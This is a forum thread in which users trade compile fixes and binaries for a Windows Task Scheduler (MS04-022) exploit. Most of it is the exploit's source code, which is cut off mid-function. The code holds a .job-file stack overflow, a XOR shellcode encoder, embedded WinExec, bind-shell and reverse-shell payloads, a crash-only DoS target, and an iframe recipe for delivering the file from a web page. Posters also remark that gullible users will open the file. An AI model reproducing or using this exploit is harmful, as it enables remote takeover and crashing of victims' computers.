explorer.c:174: error: `false' undeclared (first use in this function)
explorer.c:174: error: (Each undeclared identifier is reported only once
explorer.c:174: error: for each function it appears in.)
explorer.c:226: error: `true' undeclared (first use in this function)
explorer.c: At top level:
explorer.c:229: error: syntax error before "CreateJobFilePayload"
explorer.c: In function `CreateJobFilePayload':
explorer.c:231: error: `bool' undeclared (first use in this function)
explorer.c:231: error: syntax error before "bFoundXOR"
explorer.c:241: error: `false' undeclared (first use in this function)
explorer.c:253: error: `bFoundXOR' undeclared (first use in this function)
explorer.c:256: error: `for' loop initial declaration used outside C99 mode
explorer.c:276: error: `true' undeclared (first use in this function)
explorer.c: In function `main':
explorer.c:353: error: `bool' undeclared (first use in this function)
explorer.c:353: error: syntax error before "bCreated"
explorer.c:385: error: `bCreated' undeclared (first use in this function)
explorer.c:385: error: `false' undeclared (first use in this function)
explorer.c:449:2: warning: no newline at end of file

name the file .cpp

bool is a C++ data type, not a C data type (C only has it via &lt;stdbool.h&gt; since C99), so compile the file as C++
Nostremato
I tried it with .cpp but got still errors

explorer.cpp: In function `int main(int, char**)':
explorer.cpp:414: error: `htons' undeclared (first use this function)
explorer.cpp:414: error: (Each undeclared identifier is reported only once for
  each function it appears in.)
explorer.cpp:427: error: `inet_addr' undeclared (first use this function)
explorer.cpp:449:2: warning: no newline at end of file
ScriptGod
QUOTE (Nostremato @ Jul 26 2004, 06:19 PM)
I tried it with .cpp but got still errors

explorer.cpp: In function `int main(int, char**)':
explorer.cpp:414: error: `htons' undeclared (first use this function)
explorer.cpp:414: error: (Each undeclared identifier is reported only once for
  each function it appears in.)
explorer.cpp:427: error: `inet_addr' undeclared (first use this function)
explorer.cpp:449:2: warning: no newline at end of file

hmm, then change the lines


#ifdef WIN32
#include <winsock.h>
#endif


to


#include <winsock.h>
Nostremato
QUOTE


In file included from explorer.cpp:30:
/usr/include/w32api/winsock.h:81:2: warning: #warning "fd_set and associated mac
ros have been defined in sys/types.      This can cause runtime problems with W3
2 sockets"

explorer.cpp: undefined reference to `_htons@4'
explorer.cpp: undefined reference to `_inet_addr@4'
explorer.cpp: undefined reference to `_htons@4'
collect2: ld returned 1 exit status


thx for help scriptgod but i couldn´t compile it anyway...
It would be nice if somebody could share it for me

=k3Rn=
this new expoit seems to be really intresting, could someone perhaps modify it so that it spawn a shell ?!

this would be a great new attack then - wouldn't it?
as far as I know all Windows systems are vulnerable and the Task Scheduler is turned on by default.
Nostremato
BindShell & ReverseShell Code are already in the Code...
thats why it is the modded version by scriptgod smile.gif
=k3Rn=
hm so does it already works?
i haven't compiled it yet ...
Nostremato
the sploit seems to be quiet good but i can´t test because i´m to stupid to compile it sad.gif
ScriptGod
QUOTE (Nostremato @ Jul 26 2004, 06:43 PM)
QUOTE


In file included from explorer.cpp:30:
/usr/include/w32api/winsock.h:81:2: warning: #warning "fd_set and associated mac
ros have been defined in sys/types.      This can cause runtime problems with W3
2 sockets"

explorer.cpp: undefined reference to `_htons@4'
explorer.cpp: undefined reference to `_inet_addr@4'
explorer.cpp: undefined reference to `_htons@4'
collect2: ld returned 1 exit status


thx for help scriptgod but i couldn´t compile it anyway...
It would be nice if somebody could share it for me

you must link wsock32 or ws2_32... How to do this depends on your compiler...
try to add
[code]
#pragma comment( lib, "wsock32.lib" )
[code]
in the code

this exploit is not modded; it is completely self-written smile.gif

well, this bug can't be triggered remotely without user interaction - the target has to open the .job file
Nostremato
i´m sorry that i said it´s modded ...
Hellraiseruk
maybe someone can compile it and post it? nice code by the way ScriptGod wink.gif
xlulux
i compiled it,but im not gonna upload it. if you have compiled and gotten the syntax right lemme know what the diffrent commands do
=k3Rn=
i get the folowing errors when creating exe file:

Linker-Vorgang läuft...
04-022.obj : error LNK2001: Nichtaufgeloestes externes Symbol _inet_addr@4
04-022.obj : error LNK2001: Nichtaufgeloestes externes Symbol _htons@4
Debug/04-022.exe : fatal error LNK1120: 2 unaufgeloeste externe Verweise
Fehler beim Ausführen von link.exe.


and could you pls give me a hint how you can use it then - sorry for that lame question, but i don't find it obvious.
nuorder
nice work ScriptGod, compiles fine
mortello
QUOTE (=k3Rn= @ Jul 27 2004, 02:33 AM)
i get the folowing errors when creating exe file:

Linker-Vorgang läuft...
04-022.obj : error LNK2001: Nichtaufgeloestes externes Symbol _inet_addr@4
04-022.obj : error LNK2001: Nichtaufgeloestes externes Symbol _htons@4
Debug/04-022.exe : fatal error LNK1120: 2 unaufgeloeste externe Verweise
Fehler beim Ausführen von link.exe.


and could you pls give me a hint how you can use it then - sorry for that lame question, but i don't find it obvious.

what compiler do you use dude ?
mortello
QUOTE (ScriptGod @ Jul 26 2004, 07:09 PM)
QUOTE (Nostremato @ Jul 26 2004, 06:43 PM)
QUOTE


In file included from explorer.cpp:30:
/usr/include/w32api/winsock.h:81:2: warning: #warning "fd_set and associated mac
ros have been defined in sys/types.      This can cause runtime problems with W3
2 sockets"

explorer.cpp: undefined reference to `_htons@4'
explorer.cpp: undefined reference to `_inet_addr@4'
explorer.cpp: undefined reference to `_htons@4'
collect2: ld returned 1 exit status


thx for help scriptgod but i couldn´t compile it anyway...
It would be nice if somebody could share it for me

you must link wsock32 or ws2_32... How to do this depends on your compiler...
try to add
[code]
#pragma comment( lib, "wsock32.lib" )
[code]
in the code

this exploit its not modded. its completly self written smile.gif

well, this bug cann't be accessed remotly without user interactivity

But still, there are lots of people really stupid who will run it for you....

that and other similar local exploit....

so it can be really helpful
Krogoth
it works fine if you include the statement below, as indicated by ScriptGod.
i'm using MS Visual C++.

#pragma comment (lib,"ws2_32")
passi
QUOTE (nuorder @ Jul 27 2004, 02:38 AM)
nice work ScriptGod, compiles fine

Oh my god. I can't believe that! This [zensored] can compile it without errors and does not post it here. Very friendly...

ScriptGod: nice work, why can't YOU just upload the compiled version? blink.gif
studnikov
i posted it in the files section


Compiling...
MS04-022ScriptGod.cpp

MS04-022ScriptGod.obj - 0 error(s), 0 warning(s)

Linking...

MS04-022ScriptGod.exe - 0 error(s), 0 warning(s)
The Storm
thank ya for compiling the exploit and uploading it!
ivan288
i compiled it myself, but not sure what the correct syntax is.
any help?
twistedps
i dont see what you guys dont get heh..


void usage( const char *argv0 )
{
int n;

printf( "usage: %s <TargetID> <PayloadID> <OutputJobFile> < <Command> | <BindPort> | <IP> <Port> >\n", argv0 );

printf( "\n" );

// TargetIDs
printf( "%-8s  %-35s  %s\n", "TargetID", "Name", "EIP" );
printf( "----------------------------------------------------------\n" );
for( n = 0; n < sizeof( Targets ) / sizeof( Target ); n++ )
printf( "%-8i  %-35s  0x%08x\n", n, Targets[ n ].pszName, Targets[ n ].nNewEIP );

printf( "\n" );

// PayloadIDs
printf( "%-9s  %s\n", "PayloadID", "Name" );
printf( "--------------------------\n" );
printf( "%-9i  %s\n", PAYLOAD_ID_WINEXEC, "WinExec" );
printf( "%-9i  %s\n", PAYLOAD_ID_BIND,  "BindShell" );
printf( "%-9i  %s\n", PAYLOAD_ID_REVERSE, "ReverseShell" );
}
tibbar
i'm sorry but if you cant compile this you must be really STUPID.

oh and passiw im sure you know the policy here about compile requests...

QUOTE: "Oh my god. I can't believe that! This [zensored] can compile it without errors and does not post it here. Very friendly...

ScriptGod: nice work, why can't YOU just upload the compiled version? "

Well, it took me about 2 minutes to set up a project in vc6, paste the code in and compile it.

Here's the executable.
globey
tnx for this code i try it out
nuorder
QUOTE (passiw @ Jul 27 2004, 07:45 PM)
QUOTE (nuorder @ Jul 27 2004, 02:38 AM)
nice work ScriptGod, compiles fine

Oh my god. I can't believe that! This [zensored] can compile it without errors and does not post it here. Very friendly...

ScriptGod: nice work, why can't YOU just upload the compiled version? blink.gif

i followed all the steps posted here, if you can read and learn you will be able to compile this with no problems at all in less than a minute

if you do encounter errors while compiling im sure members would be happy to help you out, just post the error
realmasterX
QUOTE (Hellraiseruk @ Jul 26 2004, 09:31 PM)
maybe someone can compile it and post it? nice code by the way ScriptGod wink.gif

would be nice,..
im not able to compile it,... unsure.gif
brainbuster
worked nice 4 me after i added
#pragma comment( lib, "wsock32.lib" )

thx 4 sharin
ScriptGod
update


/***********************************************************************\
* MS04-022 Task Scheduler Exploit                                       *
* by ScriptGod                                                          *
*                                                                       *
* tested against:                                                       *
* - Windows XP GER SP0                                                  *
* - Windows XP GER SP1                                                  *
* - Windows 2000 GER SP4                                                *
*                                                                       *
* tested with:                                                          *
* - Explorer.exe                                                        *
* - IExplorer.exe                                                       *
*                                                                       *
* The first instruction that can be controlled can only be a few bytes  *
* long, so I used a short jump to the second (the "real") jump, which   *
* then jumps to the payload.                                            *
*                                                                       *
* The bad characters which are avoided through the XOR encoder are      *
* only GUESSED. Probably these are not all or some of them are wrong.   *
* But I haven't had any problem with this set of characters.            *
*                                                                       *
* The advisory lists Windows 2000 as well, but my Windows 2000 doesn't  *
* seem to be vulnerable. Maybe other applications, or Windows 2000 with *
* Internet Explorer 6 installed, are affected.                          *
*                                                                       *
* To use this from a web page, create an HTML file with an iframe that  *
* points to a share containing the .job file.                           *
* example:                                                              *
*                                                                       *
* <html>                                                                *
*   <body>                                                              *
*     <iframe src="\\192.168.0.1\Job">                                  *
*   </body>                                                             *
* </html>                                                               *
*                                                                       *
* THX to www.metasploit.com for their payloads                          *
\***********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>

// for Microsoft Visual C++
#ifdef _MSC_VER
 #pragma comment(lib,"ws2_32")
#endif
#endif

// Length in bytes of the Application Name string written into the .job
// file; this is the size of the ExploitData buffer that
// CreateJobFilePayload hands to CreateJobFile.
#define OVERFLOW_SIZE 1024

// Job file parts: the fixed bytes that surround the Application Name field.
// CreateJobFile writes Job_Part1, then a 16-bit character count and the
// name itself (2-byte characters plus a 2-byte terminator), then Job_Part2.
// NOTE(review): the meaning of the individual fields is not derived from
// the .job specification here; only what the bytes visibly contain is noted.
unsigned char Job_Part1[] =
"\x47\x04\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\x46\x00\xff\xff\x00\x00\x00\x00\x3c\x00\x0a\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0f\x00\x00\x00\x00\x05\x13\x04\x00"
"\x00\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";
// Job_Part2 carries a 16-bit count of 5 followed by "root" as 2-byte
// characters (72 00 6f 00 6f 00 74 00) and a 2-byte terminator - the same
// count-includes-terminator, 16-bit-character convention that CreateJobFile
// applies to the Application Name.
unsigned char Job_Part2[] =
"\x00\x00\x00\x00\x05\x00\x72\x00\x6f\x00\x6f\x00\x74\x00\x00\x00"
"\x00\x00\x00\x00\x08\x00\x03\x13\x04\x00\x00\x00\x00\x00\x00\x00";

// Control-flow stubs copied to fixed offsets of ExploitData by
// CreateJobFilePayload (Stack at 0, Jump2 at 505, Jump at 534).
unsigned char Jump[] = "\xeb\xe1";    // jmp short: rel8 0xe1 = -31 from the next instruction,
                                      // i.e. 29 bytes before the jmp itself (534 -> 505 = Jump2)
unsigned char Jump2[] = "\xe9\x02\xfe\xff\xff"; // jmp near: rel32 0xfffffe02 = -510 from the next
                                      // instruction, i.e. 505 bytes back (505 -> 0 = Stack)
unsigned char Stack[] = "\x66\x81\xec\xd0\x07"; // sub sp, 0x07d0 (= 2000; 16-bit operand via the
                                      // 0x66 prefix) - presumably moves the stack pointer away
                                      // from the buffer before the decoder's fnstenv/pop and the
                                      // payload's pushes write to the stack
// (the 0x41 = inc ecx filler used as a NOP slide is set in CreateJobFilePayload)

// Payload XOR decoder. It is copied right after Stack and is NOT encoded
// itself, so its fixed bytes must already avoid the bad characters; three
// bytes are patched per payload (see the *_OFFSET defines below).
unsigned char Decoder[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x80\xeb\xe9\x31\xc9\x66\x81\xe9\x00"
"\x80\x80\x33\xff\x43\xe2\xfa";
/*
[BITS 32]

; get EIP
fldz                      ; any FPU instruction: its address is recorded as the FPU IP
fnstenv [esp-12]          ; 28-byte FPU environment; the saved FPU IP field (offset 12)
                          ; lands exactly at [esp]
pop ebx                   ; ebx = address of fldz = first byte of the decoder
sub bl, -23               ; ebx += 23 (decoder length) -> first payload byte.
                          ; 8-bit add: assumes the decoder does not straddle a
                          ; 256-byte boundary, otherwise ebx is off by 0x100

; payload size
xor ecx, ecx
sub cx, -32768            ; imm16 placeholder (bytes 15-16), patched to the negated
                          ; payload length so that cx = payload length

xor_loop:
 xor byte [ebx], 0xff     ; key placeholder (byte 19), patched per payload
 inc ebx
 loop xor_loop
*/
#define DECODER_SIZE_OFFSET  15  // low byte of the sub cx, imm16 immediate
#define DECODER_XOR_OFFSET  19   // imm8 of xor byte [ebx], imm8

// Stack stub + decoder + encoded payload must fit in front of Jump2 at
// offset 505 of ExploitData (offset 504 stays filler): 504 usable bytes.
#define PAYLOAD_LEN_LIMIT  ( 504 - ( sizeof( Stack ) - 1 ) - ( sizeof( Decoder ) - 1 ) )

/* win32_exec - Raw Shellcode [ EXITFUNC=thread CMD= FIXSTACK=1 Size=161 ] http://metasploit.com */
// The identifier is spelled "Paylaod" (sic) and main() uses it that way; it
// is kept as-is. The command is NOT part of this array: the literal's own
// NUL is excluded everywhere via sizeof(...) - 1 (hence the commented-out
// trailing "\x00"), and main() appends the NUL-terminated command directly
// after the last instruction, so the final `call` (e8 e1 ff ff ff) pushes
// the address of that command string before jumping back into the code.
unsigned char Paylaod_WinExec[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff"/*\x00"*/;

/* win32_bind - Raw Shellcode [ EXITFUNC=thread LPORT=4444 Size=375 ] http://metasploit.com */
// Listens on TCP LPORT. Bytes 233-237 are `push 0x5c110002` (68 02 00 11 5c),
// which in memory reads 02 00 11 5c - presumably the start of the sockaddr_in
// (AF_INET = 2, then the port in network order, 0x115c = 4444). main() patches
// the two port bytes at BINDSHELL_PORT_OFFSET.
unsigned char Payload_BindShell[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d"
"\x7c\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24"
"\x10\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24"
"\x4c\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51"
"\x49\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04"
"\xff\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89"
"\xc3\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff"
"\x55\x04\x31\xdb\x53\xff\xd0";
// offset of the 2 network-order port bytes (11 5c above)
#define BINDSHELL_PORT_OFFSET 236

/* win32_reverse - Raw Shellcode [ EXITFUNC=thread LHOST=127.0.0.1 LPORT=4321 FIXSTACK=1 Size=357 ] http://metasploit.com */
unsigned char Payload_ReverseShell[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"
"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf"
"\x89\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04"
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0"
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00"
"\x00\x01\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20"
"\x59\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24"
"\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44"
"\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89"
"\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51"
"\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0"
"\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a"
"\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff\x55\x04"
"\x31\xdb\x53\xff\xd0";
#define REVERSESHELL_IP_OFFSET  222
#define REVERSESHELL_PORT_OFFSET 229

// Values accepted as <PayloadID> on the command line (see usage() and main()).
#define PAYLOAD_ID_WINEXEC 0
#define PAYLOAD_ID_BIND  1
#define PAYLOAD_ID_REVERSE 2

// One row of the target table: display name plus the value that
// CreateJobFilePayload() stores at offset 518 of the overflow buffer.
typedef struct
{
const char* pszName;
unsigned long nNewEIP; // assumed to be 4 bytes wide (Win32 build)
} Target;
// Indexed by <TargetID>; printed by usage(). The last entry is not a code
// address: 0xffffffff is never a valid user-mode address, so selecting it
// only crashes the process (denial of service).
Target Targets[] =
{
// { "Windows XP SP0+1 GER", 0x75981d71 }, // MSGINA.dll, jmp esp
{ "Windows XP SP0+1 GER", 0x7356a647 }, // mstask.dll, jmp esp
{ "DoS Windows XP ALL",  0xffffffff },
};

/*
 * Write a .job file image to pszFile.
 *
 * Layout written, in order:
 *   Job_Part1           fixed header bytes (without the array's NUL)
 *   unsigned short      character count of the application name:
 *                       nApplicationNameLen / sizeof( wchar_t ) + 1 (terminator)
 *   pApplicationName    nApplicationNameLen raw bytes; not a C string, embedded
 *                       NUL bytes are copied as-is
 *   wchar_t 0           string terminator
 *   Job_Part2           fixed trailer bytes (without the array's NUL)
 *
 * pszFile             output path, opened with "wb".
 * pApplicationName    bytes of the application-name field.
 * nApplicationNameLen number of bytes in pApplicationName.
 *
 * Returns true when the complete buffer was written; false on allocation
 * failure, fopen() failure or a short fwrite(), after printing a message on
 * stdout. A partially written file is not removed on failure.
 *
 * NOTE(review): the length field divides by sizeof( wchar_t ), which is 2 on
 * Win32 but 4 on most other platforms, while the file format is fixed - the
 * code assumes a 2-byte wchar_t. The *(unsigned short*) and *(wchar_t*)
 * stores are type-punned writes into a byte buffer (unaligned in general);
 * memcpy() of a little-endian value would be the portable equivalent.
 */
bool CreateJobFile( const char *pszFile, const unsigned char *pApplicationName, unsigned long nApplicationNameLen )
{
unsigned long nJobDataSize;
unsigned char *pJobData;
unsigned long nJobDataPos;

// alloc memory: header + length field + name + wide NUL + trailer
nJobDataSize = ( sizeof( Job_Part1 ) - 1 ) + sizeof( unsigned short ) + nApplicationNameLen + sizeof( wchar_t ) + ( sizeof( Job_Part2 ) - 1 );
pJobData  = (unsigned char*)malloc( nJobDataSize );
if( !pJobData )
{
 printf( "[-] out of memory\n" );
 return false;
}
// clean
memset( pJobData, 0x00, nJobDataSize );

nJobDataPos = 0;

// add...
// ...first part
memcpy( &pJobData[ nJobDataPos ], Job_Part1, sizeof( Job_Part1 ) - 1 );
nJobDataPos += sizeof( Job_Part1 ) - 1;

//...application name len (string length + NULL-termination wchar)
// type-punned 16-bit store; the count is in wide characters, not bytes
*(unsigned short*)&pJobData[ nJobDataPos ] = (unsigned short)( ( nApplicationNameLen / sizeof( wchar_t ) ) + 1 );
nJobDataPos += sizeof( unsigned short );

// ...application name
memcpy( &pJobData[ nJobDataPos ], pApplicationName, nApplicationNameLen );
nJobDataPos += nApplicationNameLen;

// ...application name NULL-string-termination wchar (type-punned store)
*(wchar_t*)&pJobData[ nJobDataPos ] = 0;
nJobDataPos += sizeof( wchar_t );

// ...second part
memcpy( &pJobData[ nJobDataPos ], Job_Part2, sizeof( Job_Part2 ) - 1 );
nJobDataPos += sizeof( Job_Part2 ) - 1;

// open file
FILE *pOutFile = fopen( pszFile, "wb" );
if( !pOutFile )
{
 printf( "[-] couldn't open file\n" );

 free( pJobData );
 return false;
}

// write (single call; a short count is treated as failure)
if( fwrite( pJobData, 1, nJobDataSize, pOutFile ) != nJobDataSize )
{
 printf( "[-] failed to write to file\n" );

 fclose( pOutFile );
 free( pJobData );
 return false;
}

// clean up
// NOTE(review): fclose()'s return value is not checked, so an error while
// flushing the final buffer is reported as success.
fclose( pOutFile );
free( pJobData );

return true;
}

/*
 * Build the overflow buffer for one target and hand it to CreateJobFile().
 *
 * pszFile                 output path, passed through to CreateJobFile().
 * pPayload / nPayloadLen  raw payload bytes; nPayloadLen must not exceed
 *                         PAYLOAD_LEN_LIMIT or the function fails.
 * nEIP                    value stored at offset 518 of the buffer
 *                         (Targets[].nNewEIP chosen in main()).
 *
 * Buffer layout (ExploitData, OVERFLOW_SIZE bytes; OVERFLOW_SIZE is defined
 * earlier in the file and the fixed offsets below require it to be >= 536):
 *   [0, 5)           Stack   - sub sp, 0x7d0
 *   [5, 28)          Decoder - patched with length and key
 *   [28, 28+len)     payload XORed with the chosen key
 *   elsewhere        0x41 filler (inc ecx, harmless one-byte instruction)
 *   [505, 510)       Jump2   - near jump back to offset 0
 *   [518, 522)       nEIP    - type-punned 4-byte store, assumes 32-bit unsigned long
 *   [534, 536)       Jump    - short jump back to Jump2
 *
 * Returns false, after printing a message, when the payload is too large or
 * when no single-byte key maps every payload byte outside the bad-character
 * set; otherwise returns CreateJobFile()'s result.
 *
 * NOTE(review): the global Decoder[] is patched in place, so the function is
 * not reentrant and leaves the last length/key in the global. The "%u" in the
 * size message is paired with unsigned long / size_t arguments, which only
 * matches on 32-bit ABIs.
 */
bool CreateJobFilePayload( const char *pszFile, const unsigned char *pPayload, unsigned long nPayloadLen, unsigned long nEIP )
{
bool bFoundXOR;
unsigned char cXORKey;
unsigned char PayloadXOR[ PAYLOAD_LEN_LIMIT ];
unsigned char ExploitData[ OVERFLOW_SIZE ];
int nExploitDataPos;

// test size rule
if( nPayloadLen > PAYLOAD_LEN_LIMIT )
{
 printf( "[-] your payload size of %u exeeds the limit of %u\n", nPayloadLen, PAYLOAD_LEN_LIMIT );
 return false;
}

// set up decoder and xor
memset( PayloadXOR, 0x00, sizeof( PayloadXOR ) );

// ...payload size
// The decoder computes cx = 0 - imm16, so the negated length is stored
// (little-endian, via a type-punned 16-bit store into the byte array).
*(short*)&Decoder[ DECODER_SIZE_OFFSET ] = -( (short)nPayloadLen );

// find xor key
// Keys 0x01..0xfe are tried in ascending order; 0x00 (identity) and 0xff are
// never used. A key is accepted only if no encoded byte falls in the bad set.
for( cXORKey = 0x01; cXORKey < 0xff; cXORKey++ )
{
 bFoundXOR = false;

 Decoder[ DECODER_XOR_OFFSET ] = cXORKey;
 for( unsigned long n = 0; n < nPayloadLen; n++ )
 {
  PayloadXOR[ n ] = pPayload[ n ] ^ cXORKey;

  // bad chars (I don't know if this is correct! - these chars are guessed!!!)
  // An empty payload never sets bFoundXOR, so nPayloadLen == 0 fails below.
  if( (char)PayloadXOR[ n ] == '\x00' ||
   (char)PayloadXOR[ n ] == '\x0a' ||
   (char)PayloadXOR[ n ] == '\x0d' ||
   (char)PayloadXOR[ n ] == '\x25' ||
   (char)PayloadXOR[ n ] == '\x26' ||
   (char)PayloadXOR[ n ] == '\x3d' ||
   (char)PayloadXOR[ n ] == '\x3f' ||
   (char)PayloadXOR[ n ] == '\x40' ||
   (char)PayloadXOR[ n ] == '\xfe' ||
   (char)PayloadXOR[ n ] == '\xff' )
  {
   bFoundXOR = false;
   break;
  }
  else
   bFoundXOR = true;

 }

 // found?
 if( bFoundXOR )
  break;
}
if( !bFoundXOR )
{
 printf( "[-] couldn't find an suitable xor key\n" );
 return false;
}

// fill with NOPs (using inc ecx instead of nop)
memset( ExploitData, 0x41, sizeof( ExploitData ) );

// set up exploits data
nExploitDataPos = 0;

// ...add stack "alloc"
memcpy( &ExploitData[ nExploitDataPos ], Stack, sizeof( Stack ) - 1 );
nExploitDataPos += sizeof( Stack ) - 1;

// ...add decoder (already patched with length and key above)
memcpy( &ExploitData[ nExploitDataPos ], Decoder, sizeof( Decoder ) - 1 );
nExploitDataPos += sizeof( Decoder ) - 1;

// ...add payload (the encoded copy, not pPayload)
memcpy( &ExploitData[ nExploitDataPos ], PayloadXOR, nPayloadLen );
nExploitDataPos += nPayloadLen;

// ...new EIP (type-punned store; writes sizeof( unsigned long ) bytes)
*(unsigned long*)&ExploitData[ 518 ] = nEIP;

// ...add jump backward (first jump)
memcpy( &ExploitData[ 534 ], Jump, sizeof( Jump ) - 1 );

// ...add jump backward (second jump)
memcpy( &ExploitData[ 505 ], Jump2, sizeof( Jump2 ) - 1 );

// the whole buffer, filler included, becomes the application-name field
return CreateJobFile( pszFile, ExploitData, sizeof( ExploitData ) );
}

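/*
 * Print the command-line synopsis followed by the TargetID and PayloadID
 * tables on stdout.
 *
 * argv0  program name as invoked; shown in the synopsis line.
 *
 * The table loop uses a size_t index so the comparison against the sizeof
 * expression has no signed/unsigned conversion, and the EIP column uses
 * "%lx" because Target.nNewEIP is an unsigned long.
 */
void usage( const char *argv0 )
{
 printf( "usage: %s <TargetID> <PayloadID> <OutputJobFile> < <Command> | <BindPort> | <IP> <Port> >\n", argv0 );
 printf( "\n" );

 // TargetIDs: one row per Targets[] entry; the row index is the <TargetID>
 const size_t nTargets = sizeof( Targets ) / sizeof( Targets[ 0 ] );
 printf( "%-8s  %-35s  %s\n", "TargetID", "Name", "EIP" );
 printf( "----------------------------------------------------------\n" );
 for( size_t i = 0; i < nTargets; i++ )
 {
  // printed as int because that is what main() parses with atoi()
  printf( "%-8i  %-35s  0x%08lx\n", (int)i, Targets[ i ].pszName, Targets[ i ].nNewEIP );
 }
 printf( "\n" );

 // PayloadIDs: fixed table of the three supported payload kinds
 printf( "%-9s  %s\n", "PayloadID", "Name" );
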